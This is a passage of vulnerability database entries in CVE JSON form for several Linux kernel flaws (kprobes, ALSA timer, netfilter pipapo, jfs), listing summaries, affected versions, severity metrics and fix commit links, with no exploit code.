"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:07.171Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b5808d40093403334d939e2c3c417144d12a6f33"
},
{
"url": "https://git.kernel.org/stable/c/93eb31e7c3399e326259f2caa17be1e821f5a412"
},
{
"url": "https://git.kernel.org/stable/c/5062d1f4f07facbdade0f402d9a04a788f52e26d"
},
{
"url": "https://git.kernel.org/stable/c/2df2dd27066cdba8041e46a64362325626bdfb2e"
},
{
"url": "https://git.kernel.org/stable/c/62029bc9ff2c17a4e3a2478d83418ec575413808"
},
{
"url": "https://git.kernel.org/stable/c/d15023fb407337028a654237d8968fefdcf87c2f"
},
{
"url": "https://git.kernel.org/stable/c/36b57c7d2f8b7de224980f1a284432846ad71ca0"
},
{
"url": "https://git.kernel.org/stable/c/325f3fb551f8cd672dbbfc4cf58b14f9ee3fc9e8"
}
],
"title": "kprobes: Fix possible use-after-free issue on kprobe registration",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35955",
"datePublished": "2024-05-20T09:41:48.607Z",
"dateReserved": "2024-05-17T13:50:33.136Z",
"dateUpdated": "2025-05-04T12:56:07.171Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38618 (GCVE-0-2024-38618)
Vulnerability from cvelistv5
Published
2024-06-19 13:56
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ALSA: timer: Set lower bound of start tick time
Currently ALSA timer doesn't have the lower limit of the start tick
time, and it allows a very small size, e.g. 1 tick with 1ns resolution
for hrtimer. Such a situation may lead to an unexpected RCU stall,
where the callback repeatedly queuing the expire update, as reported
by fuzzer.
This patch introduces a sanity check of the timer start tick time, so
that the system returns an error when a too small start size is set.
As of this patch, the lower limit is hard-coded to 100us, which is
small enough but can still work somehow.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-38618",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T16:01:19.317734Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-08T21:19:00.796Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:47.608Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68396c825c43664b20a3a1ba546844deb2b4e48f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/74bfb8d90f2601718ae203faf45a196844c01fa1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bdd0aa055b8ec7e24bbc19513f3231958741d0ab"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/83f0ba8592b9e258fd80ac6486510ab1dcd7ad6e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ceab795a67dd28dd942d0d8bba648c6c0f7a044b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2c95241ac5fc90c929d6c0c023e84bf0d30e84c3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/abb1ad69d98cf1ff25bb14fff0e7c3f66239e1cd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a63bd179fa8d3fcc44a0d9d71d941ddd62f0c4e"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"sound/core/timer.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "68396c825c43664b20a3a1ba546844deb2b4e48f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "74bfb8d90f2601718ae203faf45a196844c01fa1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bdd0aa055b8ec7e24bbc19513f3231958741d0ab",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "83f0ba8592b9e258fd80ac6486510ab1dcd7ad6e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ceab795a67dd28dd942d0d8bba648c6c0f7a044b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "2c95241ac5fc90c929d6c0c023e84bf0d30e84c3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "abb1ad69d98cf1ff25bb14fff0e7c3f66239e1cd",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "4a63bd179fa8d3fcc44a0d9d71d941ddd62f0c4e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"sound/core/timer.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: timer: Set lower bound of start tick time\n\nCurrently ALSA timer doesn\u0027t have the lower limit of the start tick\ntime, and it allows a very small size, e.g. 1 tick with 1ns resolution\nfor hrtimer. Such a situation may lead to an unexpected RCU stall,\nwhere the callback repeatedly queuing the expire update, as reported\nby fuzzer.\n\nThis patch introduces a sanity check of the timer start tick time, so\nthat the system returns an error when a too small start size is set.\nAs of this patch, the lower limit is hard-coded to 100us, which is\nsmall enough but can still work somehow."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:15:24.983Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/68396c825c43664b20a3a1ba546844deb2b4e48f"
},
{
"url": "https://git.kernel.org/stable/c/74bfb8d90f2601718ae203faf45a196844c01fa1"
},
{
"url": "https://git.kernel.org/stable/c/bdd0aa055b8ec7e24bbc19513f3231958741d0ab"
},
{
"url": "https://git.kernel.org/stable/c/83f0ba8592b9e258fd80ac6486510ab1dcd7ad6e"
},
{
"url": "https://git.kernel.org/stable/c/ceab795a67dd28dd942d0d8bba648c6c0f7a044b"
},
{
"url": "https://git.kernel.org/stable/c/2c95241ac5fc90c929d6c0c023e84bf0d30e84c3"
},
{
"url": "https://git.kernel.org/stable/c/abb1ad69d98cf1ff25bb14fff0e7c3f66239e1cd"
},
{
"url": "https://git.kernel.org/stable/c/4a63bd179fa8d3fcc44a0d9d71d941ddd62f0c4e"
}
],
"title": "ALSA: timer: Set lower bound of start tick time",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38618",
"datePublished": "2024-06-19T13:56:17.422Z",
"dateReserved": "2024-06-18T19:36:34.945Z",
"dateUpdated": "2025-11-04T17:21:47.608Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26809 (GCVE-0-2024-26809)
Vulnerability from cvelistv5
Published
2024-04-04 09:51
Modified
2025-05-04 12:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nft_set_pipapo: release elements in clone only from destroy path
Clone already always provides a current view of the lookup table, use it
to destroy the set, otherwise it is possible to destroy elements twice.
This fix requires:
212ed75dc5fb ("netfilter: nf_tables: integrate pipapo into commit protocol")
which came after:
9827a0e6e23b ("netfilter: nft_set_pipapo: release elements in clone from abort path").
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4a6430b99f67842617c7208ca55a411e903ba03a Version: 5ccecafc728b0df48263d5ac198220bcd79830bc Version: 9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e Version: 9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e Version: 9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e Version: 9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e Version: 9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e Version: d2b18d110685ce46ca1633b8ec586c685e243a51 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.546Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b36b83297ff4910dfc8705402c8abffd4bbf8144"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/362508506bf545e9ce18c72a2c48dcbfb891ab9c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5ad233dc731ab64cdc47b84a5c1f78fff6c024af"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ff90050771412b91e928093ccd8736ae680063c2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/821e28d5b506e6a73ccc367ff792bd894050d48b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9384b4d85c46ce839f51af01374062ce6318b2f2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b0e256f3dd2ba6532f37c5c22e07cb07a36031ee"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26809",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:50:40.137148Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:44.659Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_set_pipapo.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b36b83297ff4910dfc8705402c8abffd4bbf8144",
"status": "affected",
"version": "4a6430b99f67842617c7208ca55a411e903ba03a",
"versionType": "git"
},
{
"lessThan": "362508506bf545e9ce18c72a2c48dcbfb891ab9c",
"status": "affected",
"version": "5ccecafc728b0df48263d5ac198220bcd79830bc",
"versionType": "git"
},
{
"lessThan": "5ad233dc731ab64cdc47b84a5c1f78fff6c024af",
"status": "affected",
"version": "9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e",
"versionType": "git"
},
{
"lessThan": "ff90050771412b91e928093ccd8736ae680063c2",
"status": "affected",
"version": "9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e",
"versionType": "git"
},
{
"lessThan": "821e28d5b506e6a73ccc367ff792bd894050d48b",
"status": "affected",
"version": "9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e",
"versionType": "git"
},
{
"lessThan": "9384b4d85c46ce839f51af01374062ce6318b2f2",
"status": "affected",
"version": "9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e",
"versionType": "git"
},
{
"lessThan": "b0e256f3dd2ba6532f37c5c22e07cb07a36031ee",
"status": "affected",
"version": "9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e",
"versionType": "git"
},
{
"status": "affected",
"version": "d2b18d110685ce46ca1633b8ec586c685e243a51",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nft_set_pipapo.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.19"
},
{
"lessThan": "5.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.10.130",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.15.54",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.18.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_pipapo: release elements in clone only from destroy path\n\nClone already always provides a current view of the lookup table, use it\nto destroy the set, otherwise it is possible to destroy elements twice.\n\nThis fix requires:\n\n 212ed75dc5fb (\"netfilter: nf_tables: integrate pipapo into commit protocol\")\n\nwhich came after:\n\n 9827a0e6e23b (\"netfilter: nft_set_pipapo: release elements in clone from abort path\")."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:50.329Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b36b83297ff4910dfc8705402c8abffd4bbf8144"
},
{
"url": "https://git.kernel.org/stable/c/362508506bf545e9ce18c72a2c48dcbfb891ab9c"
},
{
"url": "https://git.kernel.org/stable/c/5ad233dc731ab64cdc47b84a5c1f78fff6c024af"
},
{
"url": "https://git.kernel.org/stable/c/ff90050771412b91e928093ccd8736ae680063c2"
},
{
"url": "https://git.kernel.org/stable/c/821e28d5b506e6a73ccc367ff792bd894050d48b"
},
{
"url": "https://git.kernel.org/stable/c/9384b4d85c46ce839f51af01374062ce6318b2f2"
},
{
"url": "https://git.kernel.org/stable/c/b0e256f3dd2ba6532f37c5c22e07cb07a36031ee"
}
],
"title": "netfilter: nft_set_pipapo: release elements in clone only from destroy path",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26809",
"datePublished": "2024-04-04T09:51:51.245Z",
"dateReserved": "2024-02-19T14:20:24.179Z",
"dateUpdated": "2025-05-04T12:54:50.329Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52600 (GCVE-0-2023-52600)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
jfs: fix uaf in jfs_evict_inode
When the execution of diMount(ipimap) fails, the object ipimap that has been
released may be accessed in diFreeSpecial(). Asynchronous ipimap release occurs
when rcu_core() calls jfs_free_node().
Therefore, when diMount(ipimap) fails, sbi->ipimap should not be initialized as
ipimap.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52600",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-06T16:42:50.823357Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:23:10.349Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.184Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/81b4249ef37297fb17ba102a524039a05c6c5d35"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93df0a2a0b3cde2d7ab3a52ed46ea1d6d4aaba5f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bc6ef64dbe71136f327d63b2b9071b828af2c2a8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8e44dc3f96e903815dab1d74fff8faafdc6feb61"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/32e8f2d95528d45828c613417cb2827d866cbdce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1696d6d7d4a1b373e96428d0fe1166bd7c3c795e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bacdaa04251382d7efd4f09f9a0686bfcc297e2e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e0e1958f4c365e380b17ccb35617345b31ef7bf3"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_mount.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "81b4249ef37297fb17ba102a524039a05c6c5d35",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "93df0a2a0b3cde2d7ab3a52ed46ea1d6d4aaba5f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bc6ef64dbe71136f327d63b2b9071b828af2c2a8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8e44dc3f96e903815dab1d74fff8faafdc6feb61",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "32e8f2d95528d45828c613417cb2827d866cbdce",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "1696d6d7d4a1b373e96428d0fe1166bd7c3c795e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "bacdaa04251382d7efd4f09f9a0686bfcc297e2e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e0e1958f4c365e380b17ccb35617345b31ef7bf3",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_mount.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: fix uaf in jfs_evict_inode\n\nWhen the execution of diMount(ipimap) fails, the object ipimap that has been\nreleased may be accessed in diFreeSpecial(). Asynchronous ipimap release occurs\nwhen rcu_core() calls jfs_free_node().\n\nTherefore, when diMount(ipimap) fails, sbi-\u003eipimap should not be initialized as\nipimap."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:32.864Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/81b4249ef37297fb17ba102a524039a05c6c5d35"
},
{
"url": "https://git.kernel.org/stable/c/93df0a2a0b3cde2d7ab3a52ed46ea1d6d4aaba5f"
},
{
"url": "https://git.kernel.org/stable/c/bc6ef64dbe71136f327d63b2b9071b828af2c2a8"
},
{
"url": "https://git.kernel.org/stable/c/8e44dc3f96e903815dab1d74fff8faafdc6feb61"
},
{
"url": "https://git.kernel.org/stable/c/32e8f2d95528d45828c613417cb2827d866cbdce"
},
{
"url": "https://git.kernel.org/stable/c/1696d6d7d4a1b373e96428d0fe1166bd7c3c795e"
},
{
